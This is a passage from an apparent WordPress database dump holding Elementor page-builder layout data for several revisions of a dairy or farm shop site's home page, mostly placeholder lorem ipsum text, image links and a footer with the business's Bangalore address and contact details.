here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"fe9d098\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1279df7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"61ee343\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1189e91\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#E2E4E28C\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#FF8236\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b0a2b03\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"27202c7\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#F0F0F0\"},\"elements\":[{\"id\":\"3c307c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"d2c5d23\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false},{\"id\":\"4cc038b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f7f100a\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false},{\"id\":\"f270d26\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"802fcc9\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false},{\"id\":\"53f4aeb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f85352a\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"204ce8a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ef00601\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0d3e7a9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-220,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/strong><\\/h4>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8863,1525,'_elementor_page_assets','a:0:{}'),(8865,1526,'_elementor_edit_mode','builder'),(8866,1526,'_elementor_template_type','wp-page'),(8867,1526,'_elementor_version','3.7.8'),(8868,1526,'_wp_page_template','elementor_canvas'),(8869,1526,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}]},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":89.680999999999997,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":10.272},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"30\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#092220\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"14a6bb1\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"785d463\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#E1D7D74F\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5ccfaed\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8e25cb7\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"far fa-lightbulb\",\"library\":\"fa-regular\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"icon_size\":{\"unit\":\"px\",\"size\":124,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false},{\"id\":\"f4996be\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6f2a1f5\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"far fa-lightbulb\",\"library\":\"fa-regular\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"icon_size\":{\"unit\":\"px\",\"size\":124,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false},{\"id\":\"24f8373\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"3cd3a5c\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"far fa-lightbulb\",\"library\":\"fa-regular\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"icon_size\":{\"unit\":\"px\",\"size\":124,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false},{\"id\":\"dc5078a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0324abe\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"far fa-lightbulb\",\"library\":\"fa-regular\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"icon_size\":{\"unit\":\"px\",\"size\":124,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-220,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/strong><\\/h4>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8870,1526,'_elementor_page_assets','a:0:{}'),(8889,1531,'_elementor_edit_mode','builder'),(8890,1531,'_elementor_template_type','wp-page'),(8891,1531,'_elementor_version','3.7.8'),(8892,1531,'_wp_page_template','elementor_canvas'),(8893,1531,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_siz